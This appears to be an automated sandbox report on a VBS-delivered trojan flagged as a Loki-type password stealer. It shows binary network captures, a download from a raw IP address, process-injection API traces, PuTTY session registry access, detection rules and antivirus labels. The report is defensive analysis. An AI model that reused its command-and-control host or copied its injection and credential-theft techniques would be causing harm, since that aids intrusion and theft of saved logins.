Data received ¬#‘WhY(¥1`FåÛø.._Yàª×FåÊg½qvY4¯5`Nõ,ցç²z D¶ã8?bV=Bö~Xòú…»Ó=Å°ëÓZ!¿¤£‚Æ&„ÂýWÍڑÕ?èmoX%&fþ‡ê5|š{f¸ýŒ|ўæCÞ¬Ð.M1Á—™™Ê7:4-|Q{K ) ©w 瘋™e`'7â~è€|(èR$ÂÌVX&ªG÷ˆÏû$xhažaÊ<Ÿ 4±\•¨ö5üé”#J±}Š­šÿsÂKì€í™\]éa# DظOqh` M„DfýÑ3D÷CåYь.³èåœh›·à¾ÆØڒ ‡¼Qè,'«ÖÙÏgµí9»‰Pٚo8zæØצ‡±‡Ânh³ ê-t½Ø±'ˆ×ǦUó(ŽÂn+ʁŒ+FéqM’ -;ûéIâ¼ó…ÅɂÒùя¯)3™iÌMrŒTCh¿­!&³( Ú÷3ŒÀÉLPüƒµGT³jw{·¨“CÍ«©ÇŸn©R“®ÈZf©`žD3±ŠWÌEý®v.©÷ÜöOÀw)U.žF‚ 9ØÁÛdûHP̲¾5úµHŠ†k5©ë‡zb&ÌL·ösaÈ40·o¤ÃYOOÙԊ!‚‹¬ª$ßxV­^"íê¼|^4a»“²®VsGK·ÓL‰­[™L»”ÂpBxN¾fa_Ãi‚3tY2ØÅû3ÇFM¨Ä¶Y™"[ÖÛćˆ¥àËúÞ8ø@º¥•‰ËƼû<¡´‘fw˜ ÖÀ²°îgÖ ‹¬_ª3,„3$ö†±÷Á¨ =ÆÕ¾$ö`/Ī°Ru™W\Åë@TháTð³qAK?Ë´Ïî3’mÂí‚…ù[¶©›¬ßoð®t5GkêÿMÍo2±¥M–ÍãˆI("ã+ó`כú祪aÚހa173á/‚ è˜RÍÊç÷Bîj¢ çƒþòF͏Ð19Z×ÉkÃÍIÑáÖ 67Cî.'7Wì6hóãú È;èÜ7èwP}ŕ|¥ÌA†*7.Ò§à®N–HçÅxŽõ…ÞÕÚ²ú¸Yý‹ÄŸê( ¹¯~K6"³0õ¦wìΟ ÌïþÄvX€ƒÑ@=æÚ €’8ç]œ|­N胆‹)|IÏʚßò¦Ý•Ãl' >ÀÜq vjِÏÓ°™ÜÝÎq/q ­÷H¢ùô½ÔÅú½ö•T4Ÿ]ã2«ñA óq£VW£Åߨiq¶ãEä¦bÀÕÁé^aSs‘/r€Y7uiµdJàÝÅÊl›½°8S~&jß.ý<³¤2˜Ö‡,&[ã6ϧRTÛR<a¥3 t¨6ÚS·]Ÿ^ÄÛÕy¼Çj–Õð/–Ÿ¥ÅTVÞs m%¶™Ð'q-¼­"½º d3<Üoí§ÄxïXJ…²PIóÑæ8·†4\Øunc³‰SAqdjÜ»¬x6wDÛ+R˜ÃuZN›~KêV 1BúeþÅïó(ð«÷Oî@r‘èt a\VX×½Qðk(%?š"÷º\כÄoĺj¤»ŸntŒøS`ï%gº“Y ZL›ììdÊmWZ¼í»ê¿¿`ĀY9ÉÊ PEßåþ…¹I«á_ì ¹€-wž§÷F9&W¨s >‡Ýä_ƒãìpb–%6y>èI½%¢ºÇq)©0՗§:UKjÓóÕ /ª`‡TÙDbЙ¬IpZTƒu‡"é¨ÿ§‚+¥úäñ šrî;Ed ¡Ÿö$I¤B|ӓ“[ž°
Data received —™£šÿõˆùT2#cPz¼w—ì÷ÐЦ‰Ä”…¤O ™¡¥¦úø‡«‘\^3 •±ϨK].áÖƯ¤Ë"“'ÚÇÄ¡ÆpÊT>Ï{¯+ÙNŠ ‘ý È­½=¾\xf½Ï²WÝ8§%8H[ OÛr×éDóW0íX|9±§è{ýäÁؾVû¿ÛÝ¡V1ÏûÊ=)c«ND£Å±xbÂ"’©g›±„ÒÊt÷0;þ$>y~M{ÈM‘6­¼i pûªÙ½Ö1%xÛ±fBU\¦»sÏü" SñÙ<GA¬™½ªCÒ+©ˆêàLWè6©î²El¨»®¥¢¹´ª(ïfôâ‘Æ°^»…¿é«,èMÑ«ºT ;,§ˆF;¢ÞGg݅…ûÜ啿Ñz¢–ÆÐ_7ÛG-¹ñ‹§'Qížï¦:Ó@%®,]ëVºÆ¾eîÀ¾òR¼«~ˆ€÷ó«:L% ÙÜÄúòa‘*b‰®7—'"Yܝò.RûÑ{;FN„[ÏÏSºÂ|s›Š€_´¦—ÿ@f |ŸÅ*"“^n XRjly@kW¾ûß[V„0]Ç3·½È‘ýEB€‰ÈèӂgPáBMiqŽÖ+Ɓ³øÀ =ûŠrƒþÒºiÑt¥˜1ÁII—^òÍ\Øîù<ªŠh÷Ùåµ-×Àê”*aÞU"D2‰EGzØԌž{?ŒTkõ o¥LÁݤé"ä<e}'p›oB‹Í}êFÌe¹§u~žá[s‹¹ƒ€(ÛÌblÍ[+Í?à@vo'¸±•`):c3êpŸyD¿K…N È® < ’ÎÓl5ïU†¶´n~ÿK·šÊØ.‘CÌ‚+­æ,§i®Êùp*ñ”– ª˜'_3Ä£²ÕÊ:m.%­¯2WG¼ùmÚH{ØzÃøÄç¦o´Í‰"Ô/*ä zgW™á*¡Km¹×"ÓC£6"eâDܱÓÌ&1ƒ«ó€$bú—g I۔ă£K!!Ê楲­‹¡UïX"ƒ— <rÉFÔJLšw”“ú
Data received š;‘5̯á/§Tg±ò¾[t‹aï üëÜyxEÇ ufÜõOLXÕG'¤œêÂM:­á<ÏÚ#¶?áaÆþŽŠ§áuÔ»¥‹½»µpðX)aÎÐ.ŸCôÞ¾Éên×<tvXí´Ð/äï‰aÐï ¥Ã"Á«pÝÀÑ£=P¾œª(Z ŸÇíºß2‰×æõKõ%÷»Õ¼Q=ÑÉ`í{%G`]“ÜÐÓZõ¿Ía%‹ètFÒDzn‡wÒ$Áȟ¦É#ƒ®Å)š3Çή£a…ì{Ï;íÃPÇäY¡¥¦&âs홰ç‰!; 5dâKFt.AèlåíÿnÈÞ›5½üœî;V ,ž†àó Ì"Ñ·÷] fÚïΧÇ^cÏóÃA%ÿKuÏw£»Ë|öoj…LÙ^Ë*®7T’ÁS†êøDÛÀ†-„¸.é/騬x$÷䇏ÏÀ¸E›ÉÒhÀÇ6.]Úìؼ^å<ߐîŒÉÉà*ë0Y)ÃæSD˜2‡«¸Rvfj‘CyEÈw*•›÷ïjMûX8YÏíÚ äøvâT!1<ÌÌSà\ÝÃ(òhàÄ© 5ÖuÂ(ElXä7E` ä¼DÖ>ÝayÛæùXc/¦™Kf‘Hçë6¦k[È£š©K‰ôÝ ÃÐå×ÈÌ €L¿Ž‰h­±¸4@šVf„@ñòçáŠw ]…´¶Þœ‚‰¶{K•:§oÖîåÉ¡‚ÿl
Data received S+« wèÏlGàëÜöj0ÌË|ؖ£¥$†Â¬úæOUr¯vêM±äPäü®h&ª¦Äsž ˆ†Ï—@¡ùÞx(ÂßÀzÆPòÀç ²äøÔt%%O˜ ©«¼{åi%ÿ›‰qä­L€pÃÜÚ;µ\åtäÃË¿p%¦*ÇÀ@YŠí9X(Ô“W&®K ¼µ ¥öÃuò_“m±àk ^ ”Lã¿Uú[ä¬"¢¯)U£ãfö²~ˆÔðØ‚r½˜Ÿh‡~\iMþèŒu^„!ÂGžØ›w š·¼‡ÌU´„;NPæ՜·0í-ˆv†ZÃôE~|'Õ &õäjm²$j'"þ¡ê|÷‰‰efSÈF4…¨<_5i‚t¸$¨Z zÁÂ`AÅ'›Œå ȍVÇ°sÒVd˦ôI ™ÓÉ ®<ÀWV·Þl¬ï Û"×ÙteÀ›n1fUu˾ö%YØB´¤íÔ;¸=‰Ä“–á0}Ñ …¿øª›£D؃ß,ˆ )kèsïM’ ©:RŦëíE @=QÞ"ü§€â…òøͬÏM}žÒ¦™Ð5J4wø òe¾LƒÈ s<^*Rd¢Üx`ÙbÊ3,ù“¥/Ûùôˆ¨÷ÃYȘ“b·¢¨ïÄWÃHDƒêùÉ jtõ18ÛóvÇ'¤9¡Iù`îªOu©ífÚ}'€q ”gDê¦Hf}¢Š³ß{´äJì>²+4^‰½+•ýˆaJ†F2V›Ý@6Ä±¦Þ ¦ÄOʯ˜’ž|NܺáŠ50#§C&£uE~I°1$Ÿ_Քp¸µ×ÚÒ½ë'là†ùñö³'ÔCĤ6RÁP#¯9‡ÉÈûÄKjíp‡]½­F£†ëù;¯³ä¿EõFHD(Z3y@L¤."ܞKLÅâE?¸NìSü.ûŽàS6ô"õqùè d%(µÑ&è>¸S—ž-j¦‡ÀüœÄ*Ïg͉|Þ¾ùªC brë½Ç<’Ï.“¾«i+x®Tv¬ 0]îÞµ r6µ4ØR(KÑ?8p!ÅmÙ¾©« 5u&{²öw©ý©gI Ò·÷ÆrœûXyÛ°»Ö‘Ga›±0a“HĜ~¥û@MÛ"`=׍^)IðR&N`¸w*4á E:H·b"°ž.ƒ¶ÉÚœòµö·+Ó7)˜L¤šuød[>ì%aê}¬×Ëö¦ ñA±3ÃnBÖE±²ëT¸c·¦†â+)’Œ›Z£§å “ˆ$!ÂÑ¢]s÷¸€Ë|ðÙ¢úŸ(¹Z*6ó66ꟅÅc¹„T=ç'oZ’I·;fڲ̖äe®Ä[‡³tP›ñ(qp›Gü£9\^²\Á÷¾·+(\;Æ`“î‡o»NÅLµª\¼j±%šŸ¹O$fõ —eb#q¯`Ât)þ¡@Œg…8_I*uZöiÒY¼ôÉ6ô-á3C´YR`]úݘgÙ".=¶r¼Á¦ <>tnúCäq4“È¡†§W+1%Þm„“ÔçÉ9Νån»35k–7õé{ñCkî}¾ð•bþO­õ—ü¶4ôâ*={@sæf‚`T\Up0ŒDáÒ®3êË H|¢äïiädBlƒ02]M—@¾“äËÜ4‚¦¯¨’Üšl¼_Çè;E™C¥«£”ÀÚÐ £1VŒˆó'îÿǃ\ayDP…à…F!~§ Rq ùÙ¢>[u’êsUt;}´.ç;?(ÑIbÓVØ{šq…‘ð%”K’¥¼*RaÂ’Ÿ÷ÊrTÝ›AgF·NÆ
Data received ¨ÛT„Öµ‡ Žø™8û°ÆضëŦ-›xVV÷؋œà"²"ÞÄhcJ^­{³:…ánïÂs$¡#Û…p?© çÔª¢ƒÕmÞª¿c÷‚CÄ[cÕöH#⮊þ¸­È®j©"º®¬Æé þB¬gPBy`îe¶l(ÿ¼JTï‡nÒFÖxmQÜ æ?ðtwLo“Ú$ QjFpÖz!,ÖÀC•…è¥; æµôà jŠæ© ÚGW4 šRÍ阁uãëÃзw+/\B3(ÿXhÊqëðm½ïoãžå·à{Ö`>i,(ŸJ慲yi%úÃÚ`ÈÔóD#ލàðBµÐT£þÎÿӝ|?cd ´¦î_í6:ÌR™Ù4縌ˆäjÄ°#<N×\6›¨Ü£±:r­C‘©g9ÊÝg¤ä0Â-žÝ >³Ã¢K•1ÄówïeÓz3õÄàƒÝX5÷„rNÃ7M^vã4È皥zŽà’Í£;m0¿·ÉúhO½iRyjêYTsÅñFô©mÒ/æ<Ó°CÿÃiáDVï”ÊÃÚ@å¥îW9æ½V1[¢×¹Ý6}Ve9•,Ñ^—µ0 œ/Mp\"=AhžàÑÞê\5ÓØûòS%\Y …U½ºìz ]Gzÿó,ö­½……»¼Ê §žâ½›¦saò¨Ð~ùth¸#²(M!cÄÛOóèp Zy*ïS)þÖ´p^$X¯»ÿ.©{À¤¶]q@¼Þê³FFRsy™F)+eùW¶›†Ùh!ÃÖ¨õïÈMNy%×ZÔïw!¬p1-ˌԣoyA÷)¥?>sœòy€ö3Úqñ·Æׂt©\`ÝL&GôÅ̞€é‘½\+ظl&ö?Ðá§`-5™iòÏ.¼ÅÍ.F¯/ÌOÀߚ+šàgmÞj¬8 wJâ80ßÊ eޖ´¸é'ˆ¬iKKl궏T§jDr•£zîÞ>+É)¡4\õN °ÏMGew~k'°Kˆ&r.ÛR–ŸP6•ŠŠë¤Aªvðƒ‹/e)&BÈñl´†ò×Gzrm­wM€N\l<£·miÝFñYÀ?ÔM¯”ºm†Zák+ÇXW÷Û$·œUqx(6~’\Âàå: ˜Ö@Ÿ>à‚ íÙj/ß(l-UP@I øî­¨
Data received MÙhÝȁ“ã\Þ®ˆ¦·NˆØ€­ù$¦ÐÃM]=³7¿ß7Ù7—Wo©C㠏e’®ªYÝT+Ó˜½:÷yâ4FN¨AR§4ÙC;@HИ™ëÙ.ÔùtæV\Z‰pbš¸Ä/œIzÎ2H–ʳÃE_¼iÓ\,Wþ1n5hVêÐ|0Œ·^ì›ëù4o5³×/pÏôÍd!+zoz Q$†Ì ÇþsM®ˆ›@ԑôØSD] ÇÓ£ò¸y6ħ}´^ñ&S(•røK\qí¿ÁL9ºt§³„!vP.*£–‘}Öý™`Ö]Ñ”ìs –"î×I™H3+r9 Õ¹¡ô…Yœ}Ç÷B$,½&£›‚J:™8Óïð>µ- —R[½›>ßræëžDԔœÙyFFpEÏjË™Ào؉ Ü:q?ñ#BM+¹§ ¼ÀŒÏ’–·V€û>Ò-m…ãù‚Ü .ÑxJd½DäA}?oûÃ1E±ÎΪè¸ÍÆ<<º[$›e§BM±kÒËŒçÊÃ(ÏͼÒסˆMí,ÎD¾¹
Data received n’ŠøIÓ¨?{ºàO\è>£ëìŸäÒÞå&OÄ×È-ːÔb/Šê­kfvPŽÃÃۆ´ÊfêËô¨ÿ®±HQèSR‰_¾Ê Œ@¡Å)Vè ä@j«~2–©„Ù9…y¦P˜ÆèÚ¡ùôD¢?ôÄÝ0÷…‰7OïYhßÊ@ͤ ?¤8kÔ6ˆh™–”3œ€˜úš¼O×(©¦÷5:ßñ%¦«*SBs=ÔòåúÇ&ªÒN X¸P $yºR>¦ª ãþû†…t“‘zÝ x÷Nå:æ}P— ±²ÁsV?*¤`¸ÌÅ^]HAØ 4¨5ú¬  ,ÔR6…Á…0Ÿ@½‚6‹TGf»#n®zÌ͂‡KP6nç‡r9Ûúæ¦((Žã3€¡o‰®kø.b’2,Ò:؟ß4Í¢ï¼g>ö†(4ôa˜|]㜛Ó•øe׃¤ž*1™ÐÏSII‰œë†÷ӌÂÇ/©ýGÃeÜÂÖÅ:Kî77Š=®-X3s …¦{<Äݖ³ã†”2FKlõa×ÄýÁTr†,Åȯ[>‚û³É“ŸRºw­½`ûC¶u[óÇ#_!mb:CÒÙ",ê¦hqQÉ.¦"⾦™þʌϹ,óÏîÑÑj ’Ê-õI¢=¨¾JèBy/²à™(yµž,£AVm•é]C8óK©oœ‡ NQ!ܳC\,VŸ²§—û˶Wº}¶T;Àƒx)“tCa&¬ꊅFa=o¥ôÂÈ'ዓ/|ãÚa¸Óä9O»í@u£ðîeYg!ÍÀ–«“4žavIUº$¢8.'#¨ZÒ¡s2™ËðlË-LˆQeiœ™½Üò¯|VðÜÓÜyOßEpGΓÐ⯔Ó<(ðÅcõ@BWôi¹g¸Ýš]MåºýÊ®´é{ÍÍØTÛ2Òõ„D³dyÀdšç?Y}‘qåï8ÜþsI£*Kwr}žO‰*!ó3ü܊ ò,å¯:ŸÆ.¯†ˆDøkcɵê]öí9tÕÔú¶¼: X\mDïƝFnM?口ŽŸô¸åã7»^t+^*»Å£%˜}õᵸŸÛ¨°nƒÍWÞ¢ai;ö륗ú+U½$QKN1¾ü³9ö.µ۝â}¤«u[µÆß³Ê1¿´±¾ZÑNZzæÂßzÈ~#’”Ñn¨7§Ž¿B¡†Ž)-ÉŽS['…j¼QëÕ º•7ëw™-ë.R'Ô%Ë@Pqey‡zÂH…Øö{ô„ïþŽÓ³Rw¯ô"§>lÔVIUš7«Ïv{¹
Data received ÆØF©•{@ºá1³•Ôt°.]õÒ÷[jl×^eޒüÁ涄‚_ÆI¯ T§m’°*äEÖY%r'ºÀ Éã?ՆeY"…$nB݉˜ô²–¦n÷ž¯BpRDC=®¼1ƒ´“ …}ñ¦Î¢ž˜ÈÌÜs¿,UYùÇÑ®ÐXù_ ¡á7½a^ÜÓ.ÒXàJ˜ú||ÍÆiÒ9gQ^™ "Jî{oâsya˜à{Á³\®ASeæoïY$ÂϦ܌#¸k–mY WÿÞ'•"/…ßÌõÖÒg(ž »yœWùn3ÚÝ´ém.“ïñ²çRó0s[=ËAHf"i4;à —çÊdWêKî“å¯ Ï¡NÂÏ8•ÇÇþìG¾²FrÞ9s°Fï¼J3úÔÁSjè‡!èS;¢Îaà»®æçÏù‡Êžç•™¸_×6b$Š)ú«e&"ªå9‚ØÞ؆(ÅI֥ڝ¥¼¾‹lÐp
Data received À
Data received †f R`ò¶N8c‰æî´Ô¬ÎÉäж ¬£)ï9Ÿ»$«!øY NÊw,cåÏ(›ýjççD wÈÜܦA¥Á‰dW%‹Ý®D‰o«½•À_sÄÇÕ"«ÇlZf´ó³¬ÐVOËdr´,œۡ n+/F»\á6B<÷*Æv}©ý [ëù¸¦ÑJÌšB‚Ù–8z[’.ÿDBYTüÚØα/« «lǺ³äðîkу\ŠUªFÈfÙ^ÿ?ñÍ֔¦ ñ3@œåzð~þõ°-é€Î#ñbŽâÉótï`ÖãâéüDQfØ"ÖOOjé;1žÂéàÖFŒ —\bÒ—Û>TQä‘OÿÂIè=Ÿ£Ë`øà}«uT÷™E©† MøÉxq_)Ô¾,«iŸž©ò”y0ÎÕøœè0²É“ÚÎVHM> T² fi2qýc”û¸•~³52$Tðªœ,#D„6œ,…fŸiE-AÎI¤—–³ xM÷‘ŸYX'Ÿò½ÿð7•pfÂ1þ™IªYï`#:wµ®Æ­Á·iFsÉßñ, P:‘#\
Data received ܆…2/ÒX–%GZ_ëä†k›‡ÄÇÊQ@ôó^™°òLÞížR¾'Û¾ÅvïÕu¯Æ)쬨]¯ä´>k-ÎÑ?›*[{cH··‹ù-˜TTÔ¹Ýx"Þêž@£¾èd‘±Þ1ëØõço«ýOz`#Kúp„­æZêøIˆÎôυ€GÎH«^ND“•ò.å`hµµúrVA(:|˜N­ø£ºÁòy¦}« þ#¢±¸£'á9¯†tàwåŒî™A`q ÷^qì-灉*1ŒÊ¿‰j;Ix–;1gÃô©‰Ë,Ø)ðš…zu²ƒxÇé×g~“‡þÏH….ɈWyŠ¥§³ _Õ׉•¨åÉí›*Á˜Úd…w6Äst Á>Ý2<:µؾhíz“ĆÞQCãjq‹é• #FÙÇ«2—»—¯J,\ÙÃAí$ø;óT¡Ò¬`&¾è ÈHêï¯Í XžÎ"LĜa4ø ʕ³B·½¡ï-u€5æ e*6ôü‚ë.Qsg‚O\™­îùÄzŠÌà|‘ww-̞Œ®Hë;¬ Ī÷`’¢IäuŠÎ0§ÿ=§Ñ3nêO¯¿ièߘDEå¿9Ϥ RŸ §£Þünï&CÈé:¯‚YÉhߢ6gçþŠÝ'ªly·*.sõƒëÒê„ÜþŒ…ÅÃÖâ~Åôt«6‘Soû§EHV’“ŽÖVìk·\¢ÙÚrà}U‘Š§º~hœÈÉ¢jàS߯ Žö°£ÐÜUbM‰ º5Y?³Ñ„`¥×©§œ2ˆ©ŽY÷S
Data received ñC³*B2:H]:cÄRq¹ÁÁ5"…&ýÀ_؅ånoòfRGà þêæO}5ù*î-Z8©„É)Á] Âxÿxqp‡v¢ÁÇ@0òÕi¥ÂÎnÿåi•ð€YpŒEÏê~ÏLøPݒš“ÛôSò.ø©…Ké)ï{M ™ÇÐR>½½e»­Ô]4“Å„Mé×à KÞxùð‚}¼Â=jv1*…£aL>ع¦¯ ±JCú:=f.¨µMØ¿>K/m-ŽK_Ñ:柶(¹UR;…:í˜Ž¦5¿ó“ï½iÊy–Y /ó¼è]§ÑZf#ÎAR¹lŸ¼cžÙWv嫘ºoT{”ª““Åps(AðycTû9¯†tH±} ɹ÷\RœH¿oùïünYË|+÷£”Re8.Û^ûbôÖîÒÕ x»îL*°RÈyö'úL¼\Ì25³GÿU- ;y:¡~7ú‹Ž S¢8/œŒ´c傹&íߙÜt^ô•BÜó¥¹zZÀãqn|uBÄ5X²aþšÅ6•øÎôKÇg•e‹´Nú;íŸ?kéêò×¹-ôe]t':ƒÌå €<ØÂKsÇð¡«S6ŒZGÈ*1ñ‚ ïïã×xä_ õZ‘©º;å¼íb”Pf{ ¦ÍŒ{v‹ÈgaP8uu€ÿ–(`·%6ïŒt¢úž÷ù7é‘9¯vY/WU™ÿ7tfo€u{DÙ+žãÒršäï‚èÅãôw¡ˆbZ/g{Ž Â<ëZëù„µ—„=ÙçAZÅŸÊŠºÓ¾\앫Xæ‘FFgêØìB óõè¬tÕß4«ÊÖ¸³_"/K;+å«0@@³Ñ‰cNÍ\û'©&ÐWc+Ìã]¶ÛTGKââ8ði÷£Bóîå](S0¿ì«âð‹2ÿŸ•“{쐒—Òǃ:ö¨ßØ*„Š©ØäzËêq ›¨kþ“¢®µŸx‘X¸=ý3cþƒ€
Data received è©Ì›µªPØ&¤…¾¸÷é”ï¦ÓŬ©WÁ“>ל Å(•»o­(ýWéɨX¼#?Å Úúíe8Š. –]wc'&yÝÅ&ÒkG×ü‚–nIUÌE¡ÙN1ƒ¦E®ßמf{Ã(F•&ÎJUtv,XÙ¦²üžÏVe²;’ ˓ö ŽˆÚ ÔÝ·Üþ‘z_™ˆõ¢€·A4?Ó5p[þÚïCÞ*…‡›EçÄ-r@” >*ybS0¸ Wñ7´ÜŠºV)ôýTCEƒä§æQ*<\]®)"VnґKú˕hüÊb&—à.hÛí¨DP?ƒ:Û%±È?—kbÆq¬EŒl®N’‹drÏi Eá™xó¬;1ñýp•r+½3×Ý¿(z­zß8{¯9|ÐCUüFɋ¼¤êx£´·Gº¥#÷] ©œ‘œ!/ø}ÚCIÿ >8[鞁|78‘As"‘sw³,ڌx4$fþÛjZÞ´E(M.Ni`œŠÉP]ÈMœÂÖ³\äØ¹Ûoî~c>£‚<\ÏtÔ·èµì¥ØA۝gù­þPÖñzÒdiÂ)¦²xóúÅ~ӞɓêðÅ,@$ÂY›»ƒLTÁÞ¢d" ÒÓ þ}íꙚïç,¯y¸„à-’?Ÿ«.@‰»­§UK*̱hT JI3Æ  õy7oUŠ††­O­cg-¹ꈞÊÜ¡óe¦jl˞Ǖn»aò‰æ<ÄΧÌg(—ÆFU)nªÎ%·$<QK¯qŒÊ7Í×l$PªÍý,dFÌ ªª‰Ž’ñv‡UoGšÌfVûsöÄÙ'ý“›¦Öë„eba·‡ö=OÁzºÌȏÙüä¶ìSVö‡G¦`¨ÝDBÝÙ(@@1ÈG‹ªQÃå¼Ì¡Mná&ó±2Œ5XwïI>=hyS¤*¢^^ùì5;Evˆ]Kq‘ֹ¤ËvÉZ¯ÛZPû”DÕX‘&Úr>þE¦UŽò¬ ¾¿Íkv©ZQ”$Üfå:hæ4,-‘¹ ûìì²IHÖOFÛæê%›ë$¶9‡È‰·i¿n¬SEz¢.+g¢LÇ×ÿ°UÚñc}a“²B(¯Ï‹÷+=JïbE8B¢ÒãW8¡Y}Õfxè|õ·LÚÞ~Cj°¸Uj„õÀþžSH £”^Ë4`,wúïk(yðŸ6~`dhä‘x©;UNBJ=Mï܏ÅPuŽS|m ´j÷ugÝÁ¥y}Fi®;#_š ü¤-Sš —Sk¶Á>D3Ûãm°ã0Òc5pð‡áðE}¤nÊ»{j4–x‰ZÆdáØ!ñ£¿÷.‘›˜p KKKP–ÙøÈøPK´Òiðû¿qÿ˜¼ÝI w̚! þ[:²Mb´Çº‰X†©‡ÏhPÐÞ)ÉëOÇ£Gý†èêœýUI̝w“õ¥h¦æc"Ôo^½qñÖ~œ"¯‹iFï :6ŠßxC ~)„°wc‰¢@+$ä3&R󝡷?£ám¥¬Š’ï©;Î_ÔÄI-ù+™~ئÓŒ r¶ 2ZþÇ´ZT²d<MWÎĸyC׋Â45™¶ =üÊ­•Õ„ê/’äç(þ‘+Õ¡Q쉕„x¿QñÄðëPÚ³ÉóU꒔§ ædŠ{cBø¦1&ÛTí¾ò6­òÏòþÈn'Ò«„Ý,;Ï|fÿÕh ¾ö ËK©ˆbS ú‘R™wÎߎäψ·Ð6¢%¸ÞEq©˜»B4¾c߃L؟ãwô¯ ¢eãÖá 3;wْ)»Á+Í{«vvó•0
Data sent qmeBû <j¶*Œ•¨c¸z˜Ïz›&B8fÉë9њX±/5 ÀÀÀ À 28,ÿimageupload.io  
Data sent FBAK- Öþ.ïä-ò(“îÊ-fb’½‚Ïä8‡ji· Çr_ÖDºÓIv¼Kák=>¢Ù­Õ A]ˆ’„/½0%oFlÐ'¦>¥ß™àåÓi>À’‡? Ä¤Pëí¤\VÄÁ“ÿ+ŽN‹ó¹ 
Data sent €HHif>•C‘…g5£ßuÕr%õøÿ՛ܓA„vSî°Ä¨SDR.wpæ‹ ò#V™ÁÒøÏ£‚Q&RZ&1®´CØFìäȁj™ä"hž/.¿&ޞ*~$ݎ4wУƬÿyu (3BFkç¹Ï×–¨
Data sent GET /file/PuttyLinks.txt HTTP/1.1 Host: 107.175.113.212 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
url https://www.chiark.greenend.org.uk/
description Communications over RAW Socket rule Network_TCP_Socket
description Take ScreenShot rule ScreenShot
description PWS Memory rule Generic_PWS_Memory_Zero
description Communications use DNS rule Network_DNS
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description Win32 PWS Loki rule Win32_PWS_Loki_m_Zero
host 107.175.113.212
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2680
region_size: 1499136
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000384
1 0 0
registry HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL³­édà Z ê &è @à#@hд€@«J W0¤ ˜Ó  • ÀlÖP.textŠX Z  `.rdata‹p Œ^ @@.dataØ@ ê@À.00cfgPö@@.tls `ø@À.voltbl’pú.rsrc@«€¬ü@@.reloc¤ 0¢¨@B
base_address: 0x00400000
process_identifier: 2680
process_handle: 0x00000384
1 1 0

WriteProcessMemory

 buffer: dpLæLÿÿÿÿÿÿÿÿÿÿÿÿNl±¿DNæ@»u˜DPDPÀàDÿÿÿÿàKMtˆM,‹MĈM|‹M‰M̋MX‰MŒMœ‰MTŒMà‰M˜ŒM$ŠM܌M¬ŠMdMhŠM MD…M äOØP ÙOäP ½OðPÈOüP «OP¶OP¤O P ÏOÿÿÿÿ<±M ÿÿÿÿÿÿÿÿÿÿÿÿ€  abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ¤`‚y‚!¦ß¡¥Ÿàü@~€ü¨Á£Ú£ þ@þµÁ£Ú£ þAþ¶Ï¢ä¢å¢è¢[þ@~¡þQQÚ^Ú _ÚjÚ2ÓØÞàù1~þ8¬MPPPPPPP¸®M8°M©MÐP°PC   8¬M:±M¤P´?P´?P´?P´?P´?P´?P´?P´?P´?P¨P¸?P¸?P¸?P¸?P¸?P¸?P¸?PPP..þÿÿÿ “PSTPDTPSTPDTÈ P PH PÈ Pÿÿÿÿÿÿÿÿþÿÿÿè¤M.?AVbad_exception@std@@è¤M.?AVexception@std@@è¤M.?AVtype_info@@
base_address: 0x00500000
process_identifier: 2680
process_handle: 0x00000384
1 1 0

WriteProcessMemory

 buffer: VëI
base_address: 0x00505000
process_identifier: 2680
process_handle: 0x00000384
1 1 0

WriteProcessMemory

 buffer:
base_address: 0x00506000
process_identifier: 2680
process_handle: 0x00000384
1 1 0

WriteProcessMemory

 buffer:   ^[^è£ÛÞ!&079< #7:RT <?@Cwy¯² \^…‡™›ËÍIK´á!$  ), %);>MPqtÆÉ8;FI "14;>UX§ª=@WZ©¬69 "'
base_address: 0x00507000
process_identifier: 2680
process_handle: 0x00000384
1 1 0

WriteProcessMemory

 buffer: @
base_address: 0x7efde008
process_identifier: 2680
process_handle: 0x00000384
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

 buffer: MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL³­édà Z ê &è @à#@hд€@«J W0¤ ˜Ó  • ÀlÖP.textŠX Z  `.rdata‹p Œ^ @@.dataØ@ ê@À.00cfgPö@@.tls `ø@À.voltbl’pú.rsrc@«€¬ü@@.reloc¤ 0¢¨@B
base_address: 0x00400000
process_identifier: 2680
process_handle: 0x00000384
1 1 0
MicroWorld-eScan VB:Trojan.Valyria.8583
FireEye VB:Trojan.Valyria.8583
VIPRE VB:Trojan.Valyria.8583
Symantec Scr.Malscript!gen11
ESET-NOD32 VBS/Kryptik.UA
Avast VBS:Obfuscated-KJ [Cryp]
Kaspersky HEUR:Trojan.Script.Generic
BitDefender VB:Trojan.Valyria.8583
Rising Downloader.Agent/VBS!1.EC5A (CLASSIC)
Emsisoft VB:Trojan.Valyria.8583 (B)
GData VB:Trojan.Valyria.8583
Google Detected
MAX malware (ai score=83)
Arcabit VB:Trojan.Valyria.D2187
ALYac VB:Trojan.Valyria.8583
Ikarus Trojan.VBS.Agent
AVG VBS:Obfuscated-KJ [Cryp]
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
Time & API Arguments Status Return Repeated

send

 buffer: qmeBû <j¶*Œ•¨c¸z˜Ïz›&B8fÉë9њX±/5 ÀÀÀ À 28,ÿimageupload.io  
socket: 1444
sent: 118
1 118 0

send

